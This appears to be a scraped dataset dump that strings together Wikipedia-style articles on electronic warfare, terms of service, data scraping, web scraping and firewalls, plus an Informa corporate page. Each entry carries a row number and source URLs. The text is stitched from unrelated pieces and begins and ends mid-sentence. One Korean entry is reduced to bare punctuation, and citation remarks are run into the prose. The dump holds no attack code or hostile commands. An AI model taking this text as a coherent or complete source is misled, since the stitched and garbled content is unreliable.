(ECCM) are a measure used to protect against an electronic enemy attack (EA) or to protect against friendly forces who unintentionally deploy the equivalent of an electronic attack on friendly forces. (sometimes called EW fratricide). 8 The effectiveness of electronic protection (EP) level is the ability to counter an electronic attack (EA). Flares are often used to distract infrared homing missiles into missing their target. The use of flare rejection logic in the guidance (seeker head) of an infrared homing missile to counter an adversary's use of flares is an example of EP. While defensive EA actions (jamming) and EP (defeating jamming) both protect personnel, facilities, capabilities, and equipment, EP protects from the effects of EA (friendly and or adversary). Other examples of EP include spread spectrum technologies, the use of restricted frequency lists, emissions control (EMCON), and low observability (stealth) technology. 2 Electronic warfare self-protection (EWSP) is a suite of countermeasure systems fitted primarily to aircraft for the purpose of protecting the host from weapons fire and can include, among others: directional infrared countermeasures (DIRCM, flare systems and other forms of infrared countermeasures for protection against infrared missiles; chaff (protection against radar-guided missiles); and DRFM decoy systems (protection against radar-targeted anti-aircraft weapons). An electronic warfare tactics range (EWTR) is a practice range that provides training for personnel operating in electronic warfare. There are two examples of such ranges in Europe: one at RAF Spadeadam in the northwest county of Cumbria, England, and the Multinational Aircrew Electronic Warfare Tactics Facility Polygone range on the border between Germany and France. EWTRs are equipped with ground-based equipment to simulate electronic warfare threats that aircrew might encounter on missions. Other EW training and tactics ranges are available for ground and naval forces as well. Antifragile EW is a step beyond standard EP, occurring when a communications link being jammed actually increases in capability as a result of a jamming attack, although this is only possible under certain circumstances such as reactive forms of jamming. 9 Electronic warfare support (ES) is a subdivision of EW involving actions taken by an operational commander or operator to detect, intercept, identify, locate, and or localize sources of intended and unintended radiated electromagnetic (EM) energy. These Electronic Support Measures (ESM) aim to enable immediate threat recognition focuses on serving military service needs even in the most tactical, rugged, and extreme environments. This is often referred to as simply reconnaissance, although today, more common terms are intelligence, surveillance and reconnaissance (ISR) or intelligence, surveillance, target acquisition, and reconnaissance (ISTAR). The purpose is to provide immediate recognition, prioritization, and targeting of threats to battlefield commanders. 2 Signals intelligence (SIGINT), a discipline overlapping with ES, is the related process of analyzing and identifying intercepted transmissions from sources such as radio communication, mobile phones, radar, or microwave communication. SIGINT is broken into two categories: electronic intelligence (ELINT) and communications intelligence (COMINT). Analysis parameters measured in signals of these categories can include frequency, bandwidth, modulation, and polarization. The distinction between SIGINT and ES is determined by the controller of the collection assets, the information provided, and the intended purpose of the information. Electronic warfare support is conducted by assets under the operational control of a commander to provide tactical information, specifically threat prioritization, recognition, location, targeting, and avoidance. However, the same assets and resources that are tasked with ES can simultaneously collect information that meets the collection requirements for more strategic intelligence. 2 The earliest documented use of EW was during the Second Boer War of 1899 1902. The British Army, when trying to relieve Ladysmith, under siege by the Boers, used a searchlight to "bounce" Morse code signals off the clouds. The Boers immediately spotted this and used one of their own searchlights in an attempt to jam the British signals. This was graphically described by Winston Churchill in his book London to Ladysmith via Pretoria. During the Russo-Japanese War of 1904 1905 the Japanese auxiliary cruiser Shinano Maru had located the Russian Baltic Fleet in Tsushima Strait, and was communicating the fleet's location by radio signals to the Imperial Japanese Fleet HQ. The captain of the Russian warship Ural requested permission to disrupt the Japanese communications link by attempting to transmit a stronger radio signal over the Shinano Maru's signal, hoping to distort the Japanese signal at the receiving end. Russian Admiral Zinovy Rozhestvensky refused the advice and denied the Ural permission to electronically jam the enemy, which in those circumstances might have proved invaluable. The intelligence the Japanese gained ultimately led to the decisive Battle of Tsushima, where the Russian Navy lost all its battleships and most of its cruisers and destroyers. These losses effectively ended the Russo-Japanese War in Japan's favor. 10 better source needed During World War II, the Allies and Axis Powers both extensively used EW, or what Winston Churchill referred to as the "Battle of the Beams": as navigational radars were used to guide bombers to their targets and back to their base, the first application of EW in WWII was to interfere with the navigational radars. Chaff was also introduced during WWII to confuse and defeat tracking radar systems. As battlefield communication and radar technology improved, so did electronic warfare, which played a major role in several military operations during the Vietnam War. Aircraft on bombing runs and air-to-air missions often relied on EW to survive the battle, although many were defeated by Vietnamese ECCM. 11 In 2007, an Israeli attack on a suspected Syrian nuclear site during Operation Outside the Box (or Operation Orchard) used electronic warfare systems to disrupt Syrian air defenses while Israeli jets crossed much of Syria, bombed their targets, and returned to Israel undeterred. 12 13 The target was a suspected nuclear reactor under construction near the Euphrates River, modeled after a North Korean reactor and supposedly financed with Iranian assistance. Some reports say 13 Israeli EW systems deactivated all of Syria's air defense systems for the entire period of the raid. In December 2010, the Russian Army deployed their first land-based multifunctional electronic warfare system known as Borisoglebsk 2, developed by Sozvezdie. Development of the system started in 2004 and evaluation testing successfully completed in December 2010. The Borisoglebsk 2 uses four different types clarification needed of jamming stations on a single system. The Borisoglebsk 2 system is mounted on nine MT-LB armored vehicles and is intended to suppress mobile satellite communications and satellite-based navigation signals. 14 This EW system is developed to conduct electronic reconnaissance and suppression of radio-frequency sources. 15 In August 2015, the Swedish newspaper Svenska Dagbladet said its initial usage caused concern within NATO. 16 A Russian blog described Borisoglebsk 2 thus: 17 The 'Borisoglebsk 2', when compared to its predecessors, has better technical characteristics: wider frequency bandwidth for conducting radar collection and jamming, faster scanning times of the frequency spectrum, and higher precision when identifying the location and source of radar emissions, and increased capacity for suppression. During the first two days of the 2022 Russian invasion of Ukraine, Russian EW disrupted Ukraine's air defense radars and communications, severely disrupting Ukrainian ground-based air defense systems. Russian jamming was so effective it interfered with their own communications, so efforts were scaled back. This led to Ukrainian SAMs regaining much of their effectiveness, which began inflicting significant losses on Russian aircraft by the start of March 2022. 18 Rapid Russian advances at the start of the war prevented EW troops from properly supporting the advancing troops, but by late March and April 2022, extensive jamming infrastructure had been deployed. EW complexes were set up in Donbas in concentrations of up to 10 complexes per 13 mi (21 km) of frontage. Electronic suppression of GPS and radio signals caused heavy losses of Ukrainian UAVs, depriving them of intelligence and precise artillery fire spotting. Small quadcopters had an average life expectancy of around three flights, and larger fixed-wing UAVs like the Bayraktar TB2 had a life expectancy of about six flights. By summer 2022, only some one-third of Ukrainian UAV missions could be said to have been successful, as EW had contributed to Ukraine losing 90% of the thousands of drones it had at the beginning of the invasion. 19 Russian EW capacity to disrupt GPS signals is credited with the reduction in the success of Ukrainian usage of HIMARS and JDAM bombs. The failure of GPS guidance forces these weapons, in particular JDAMS, to use inertial navigation system which reduces accuracy from around 5 metres (15 ft) down to around 27 metres (90 ft). 20 Ukraine was losing some 10,000 drones a month due to Russian electronic warfare, according to a 19 May 2023 report by the Royal United Services Institute. This was an average of 300 drones a day. Russia has established EW posts about every 10 kilometres (6 mi) of the front, being some 6 kilometres (4 mi) back from the front line. 21 In October 2023, The Economist reported that electronic warfare was in widespread use on front lines to impair small battlefield UAV activity, with Russia installing video feedback and control jammers on high-value equipment like tanks and artillery. 22 By 11 March 2024, Ukraine reported it had destroyed a Russian Palantin EW system in Zaporizhzhia Oblast, 23 which "suppress satellite radio navigation along the entire line of contact and in most parts of Ukraine, replacing the satellite radio navigation field (spoofing) . 24 An estimated three Palantin systems have been hit (June 2022, February 2023, and March 2024). 24 In addition to the Palantin, in Zaporizhzhia a Layer EW system was destroyed. 25 In the movie Spaceballs, an electronic attack "jams" a weapons system with a literal jar of jam. In both Top Gun: Maverick and Behind Enemy Lines, characters utilize chaff and flares from their F A 18s to confuse deflect guided missiles. citation needed Other electronic warfare systems: Historic: U.S. specific: |
669 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Terms_of_service | Terms of service (also known as terms of use and terms and conditions, commonly abbreviated as TOS or ToS, ToU or T C) are the legal agreements between a service provider and a person who wants to use that service. The person must agree to abide by the terms of service in order to use the offered service. 1 Terms of service can also be merely a disclaimer, especially regarding the use of websites. Vague language and lengthy sentences used in these terms of service have caused concerns about customer privacy and raised public awareness in many ways. A terms of service agreement is mainly used for legal purposes by companies which provide software or services, such as web browsers, e-commerce, web search engines, social media, and transport services. A legitimate terms of service agreement is legally binding and may be subject to change. 2 Companies can enforce the terms by refusing service. Customers can enforce by filing a lawsuit or arbitration case if they can show they were actually harmed by a breach of the terms. There is a heightened risk of data going astray during corporate changes, including mergers, divestitures, buyouts, downsizing, etc., when data can be transferred improperly. 3 A terms of service agreement typically contains sections pertaining to one or more of the following topics: Among 102 companies marketing genetic testing to consumers in 2014 for health purposes, 71 had publicly available terms and conditions: 4 Among 260 mass market consumer software license agreements in 2010: 5 Among the terms and conditions of 31 cloud-computing services in January-July 2010, operating in England: 6 The researchers note that rules on location and time limits may be unenforceable for consumers in many jurisdictions with consumer protections, that acceptable use policies are rarely enforced, that quick deletion is dangerous if a court later rules the termination wrongful, that local laws often require warranties (and UK forced Apple to say so). Among the 500 most-visited websites which use sign-in-wrap agreements in September 2018: 7 Among 260 mass market consumer software license agreements which existed in both 2003 and 2010: 5 A 2013 documentary called Terms and Conditions May Apply publicized issues in terms of services. It was reviewed by 54 professional critics 8 and won for Best Feature Documentary at the Newport Beach Film Festival 2013 and for Best Documentary at the Sonoma Valley Film Festival 2013. 9 Clickwrapped.com rates 15 companies on their policies and practices with respect to using users' data, disclosing users' data, amending the terms, closing users' accounts, requiring arbitration, fining users, and clarity. Terms of Service; Didn't Read is a group effort that rates 67 companies' terms of service and privacy policies, though its site says the ratings are "outdated. 10 It also has browser add-ons that deliver the ratings while at the website of a rated company. Members of the group score each clause in each terms of service document, but "the same clause can have different scores depending on the context of the services it applies to. 11 The Services tab lists companies in no apparent order, with brief notes about significant clauses from each company. In particular, competitors are not listed together so that users can compare them. A link gives longer notes. It does not typically link to the exact wording from the company. The Topics tab lists topics (like "Personal Data" or "Guarantee"), with brief notes from some companies about aspects of the topic. TOSBack.org, supported by the Electronic Frontier Foundation, lists changes in terms and policies sequentially, 10 per page, for 160 pages, or nearly 1,600 changes, for "many online services. 12 There does not seem to be a way to find all changes for a particular company, or even which companies were tracked in any time period. It links to Terms of Service; Didn't Read, though that typically does not have any evaluation of the most recent changes listed at TOSBack.org. Terms of services are subject to change and vary from service to service, so several initiatives exist to increase public awareness by clarifying such differences in terms, including: In 1994, the Washington Times reported that America Online (AOL) was selling detailed personal information about its subscribers to direct marketers, without notifying or asking its subscribers. That article led to the revision of AOL's terms of service three years later. On July 1, 1997, AOL posted their revised terms of service to take effect July 31, 1997, without formally notifying its users of the changes made, most notably a new policy which would grant third-party business partners, including a marketing firm, access to its members' telephone numbers. Several days before the changes were to take effect, an AOL member informed the media of the changes and the following news coverage incited a large influx of internet traffic on the AOL page which enabled users to opt out of having their names and numbers on marketing lists. 1 In 2011, George Hotz and other members of failOverflow were sued by Sony Corporation. Sony claimed that Hotz and others had committed breach of contract by violating the terms of service of the PlayStation Network and the Digital Millennium Copyright Act. 13 On December 17, 2012, Instagram and Facebook announced a change to their terms of use that caused a widespread outcry from its user base. The controversial clause stated: "you agree that a business or other entity may pay us to display your username, likeness, photos (along with any associated metadata), and or actions you take, in connection with paid or sponsored content or promotions, without any compensation to you". There was no apparent option to opt out of the changed terms of use. 14 The move garnered severe criticism from privacy advocates as well as consumers. After one day, Instagram apologized, saying that it would remove the controversial language from its terms of use. 15 Kevin Systrom, a co-founder of Instagram, responded to the controversy, stating: Our intention in updating the terms was to communicate that we’d like to experiment with innovative advertising that feels appropriate on Instagram. Instead, it was interpreted by many that we were going to sell your photos to others without any compensation. This is not true and it is our mistake that this language is confusing. To be clear: it is not our intention to sell your photos. We are working on updated language in the terms to make sure this is clear. 16 Some terms of services are worded to allow unilateral amendment, where one party can change the agreement at any time without the other party's consent. A 2012 court case In re Zappos.com, Inc., Customer Data Security Breach Litigation held that Zappos.com's terms of use, with one such clause, was unenforceable. 17 On October 5, 2023, a 42 year-old woman named Kanokporn Tangsuan (who worked as a doctor at NYU Langone Health) was killed at Raglan Road Irish Pub at Disney Springs in Walt Disney World after going into anaphylactic shock due to increased levels of dairy and nuts in her system. Her widow, Jeffery Piccolo, filed a wrongful death lawsuit against Disney in February 2024, claiming that she had alerted staff to her severe allergy to both multiple times, but was ignored. 18 On May 31, Disney filed a motion to get the lawsuit dismissed, citing the terms of service of both the My Disney Experience app (which they booked tickets from) and Disney (which they had used a free trial of in the past). This term would require all legal disputes against Disney and its affiliates to be held in an individual binding arbitration. 19 The story's publicization in August 2024 prompted severe backlash against the Walt Disney Company, with many moving to cancel their subscriptions to Disney and for a boycott of other Disney products and services. Piccolo's legal team also argued against Disney's claims, first stating that the terms of service on both platforms were "effectively invisible", and that Piccolo "would have had no notice" of the conditions. They also argued that Piccolo's use of these services should have no effect on Tangsaun's right to be represented in this case. 19 20 Disney responded by claiming to be "deeply sorry" of the death, and that they were only defending themselves against a lawsuit towards the entire corporation. 21 As of August 15, 2024, Disney's motion is still pending, but a hearing is still scheduled to take place on October 2, 2024. 21 |
670 | https://en.wikipedia.org/wiki/Data_scraping | https://ko.wikipedia.org/wiki/%EB%8D%B0%EC%9D%B4%ED%84%B0_%EC%8A%A4%ED%81%AC%EB%A0%88%EC%9D%B4%ED%95%91 | (data scraping) . . . . " " . ( ) . ( ), , , , . IBM 3270 (screen scraping) . 1 . " " . , . . , . |
671 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-28 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
672 | https://en.wikipedia.org/wiki/Web_scraping | http://www.xconomy.com/san-francisco/2012/07/25/diffbot-is-using-computer-vision-to-reinvent-the-semantic-web/ | This site is part of the Informa Connect Division of Informa PLC This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them. Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 3099067. Find out about our industry events, digital content, and on-demand experiences, providing you with exceptional insights, connections, and commercial edge. one of our 450 international events and elevate your career with over 800 courses Attend our next events, either in person, online or on-demand. A multi-hyphenate Emmy award winning showrunner, writer, actor, director, and producer who has built his career telling vibrant and comedic stories. The daughter of Dr. Martin Luther King Jr., Dr. Bernice Albertine King is a connector, communicator, community builder and CEO of The King Center. Keynote speaker, actor, activist, philanthropist, and author. Winner of two Oscars, and Emmy nomination for the longest-running series on Netflix. CenterStage, the resource and reward program for subject matter experts, dedicated to placing talent in spotlight. The 60th Mayor of Atlanta, Georgia, and a visionary leader in bringing equitable outcomes to the forefront of government and commerce. Attend our training courses, either in person, online or on-demand. with more than 698,000 industry peers more than 600 expert videos alongside more than 11,000 global experts more than 2,800 expert articles See what your industry is talking about right now. Providing professionals with access to extraordinary people and exceptional insight. Our people frame our thinking and guide our work Diversity brings more experience, more voices and more talent We embrace our responsibility for our planet and our fellows We are taking steps to become a more sustainable company Our people frame our thinking and guide our work Diversity brings more experience, more voices and more talent We embrace our responsibility for our planet and our fellows We are taking steps to become a more sustainable company Our people frame our thinking and guide our work Diversity brings more experience, more voices and more talent We embrace our responsibility for our planet and our fellows Copyright 2024 Informa Connect Limited. Registered in England Wales with number 01835199, registered office 5 Howick Place, London, SW1P 1WG. |
673 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Firewall_(computing) | In computing, a firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. 1 2 A firewall typically establishes a barrier between a trusted network and an untrusted network, such as the Internet. 3 The term firewall originally referred to a wall intended to confine a fire within a line of adjacent buildings. 4 Later uses refer to similar structures, such as the metal sheet separating the engine compartment of a vehicle or aircraft from the passenger compartment. The term was applied in the 1980s to network technology 5 that emerged when the Internet was fairly new in terms of its global use and connectivity. 6 The predecessors to firewalls for network security were routers used in the 1980s. Because they already segregated networks, routers could apply filtering to packets crossing them. 7 Before it was used in real-life computing, the term appeared in the 1983 computer-hacking movie WarGames, and possibly inspired its later use. 8 One of the earliest commercially successful firewall and network address translation (NAT) products was the PIX (Private Internet eXchange) Firewall, invented in 1994 by Network Translation Inc., a startup founded and run by John Mayes. The PIX Firewall technology was coded by Brantley Coile as a consultant software developer. 9 Recognizing the emerging IPv4 address depletion problem, they designed the PIX to enable organizations to securely connect private networks to the public internet using a limited number of registered IP addresses. The innovative PIX solution quickly gained industry acclaim, earning the prestigious "Hot Product of the Year" award from Data Communications Magazine in January 1995. Cisco Systems, seeking to expand into the rapidly growing network security market, subsequently acquired Network Translation Inc. in November 1995 to obtain the rights to the PIX technology. The PIX became one of Cisco's flagship firewall product lines before eventually being succeeded by the Adaptive Security Appliance (ASA) platform introduced in 2005. Firewalls are categorized as a network-based or a host-based system. Network-based firewalls are positioned between two or more networks, typically between the local area network (LAN) and wide area network (WAN), 10 their basic function being to control the flow of data between connected networks. They are either a software appliance running on general-purpose hardware, a hardware appliance running on special-purpose hardware, or a virtual appliance running on a virtual host controlled by a hypervisor. Firewall appliances may also offer non-firewall functionality, such as DHCP 11 12 or VPN 13 services. Host-based firewalls are deployed directly on the host itself to control network traffic or other computing resources. 14 15 This can be a daemon or service as a part of the operating system or an agent application for protection. The first reported type of network firewall is called a packet filter, which inspects packets transferred between computers. The firewall maintains an access-control list which dictates what packets will be looked at and what action should be applied, if any, with the default action set to silent discard. Three basic actions regarding the packet consist of a silent discard, discard with Internet Control Message Protocol or TCP reset response to the sender, and forward to the next hop. 16 Packets may be filtered by source and destination IP addresses, protocol, or source and destination ports. The bulk of Internet communication in 20th and early 21st century used either Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) in conjunction with well-known ports, enabling firewalls of that era to distinguish between specific types of traffic such as web browsing, remote printing, email transmission, and file transfers. 17 18 The first paper published on firewall technology was in 1987 when engineers from Digital Equipment Corporation (DEC) developed filter systems known as packet filter firewalls. At AT T Bell Labs, Bill Cheswick and Steve Bellovin continued their research in packet filtering and developed a working model for their own company based on their original first-generation architecture. 19 In 1992, Steven McCanne and Van Jacobson released a paper on BSD Packet Filter (BPF) while at Lawrence Berkeley Laboratory. 20 21 From 1989 1990, three colleagues from AT T Bell Laboratories, Dave Presotto, Janardan Sharma, and Kshitij Nigam, developed the second generation of firewalls, calling them circuit-level gateways. 22 Second-generation firewalls perform the work of their first-generation predecessors but also maintain knowledge of specific conversations between endpoints by remembering which port number the two IP addresses are using at layer 4 (transport layer) of the OSI model for their conversation, allowing examination of the overall exchange between the nodes. 23 Marcus Ranum, Wei Xu, and Peter Churchyard released an application firewall known as Firewall Toolkit (FWTK) in October 1993. 24 This became the basis for Gauntlet firewall at Trusted Information Systems. 25 26 The key benefit of application layer filtering is that it can understand certain applications and protocols such as File Transfer Protocol (FTP), Domain Name System (DNS), or Hypertext Transfer Protocol (HTTP). This allows it to identify unwanted applications or services using a non standard port, or detect if an allowed protocol is being abused. 27 It can also provide unified security management including enforced encrypted DNS and virtual private networking. 28 29 30 As of 2012, the next-generation firewall provides a wider range of inspection at the application layer, extending deep packet inspection functionality to include, but is not limited to: Endpoint-based application firewalls function by determining whether a process should accept any given connection. Application firewalls filter connections by examining the process ID of data packets against a rule set for the local process involved in the data transmission. Application firewalls accomplish their function by hooking into socket 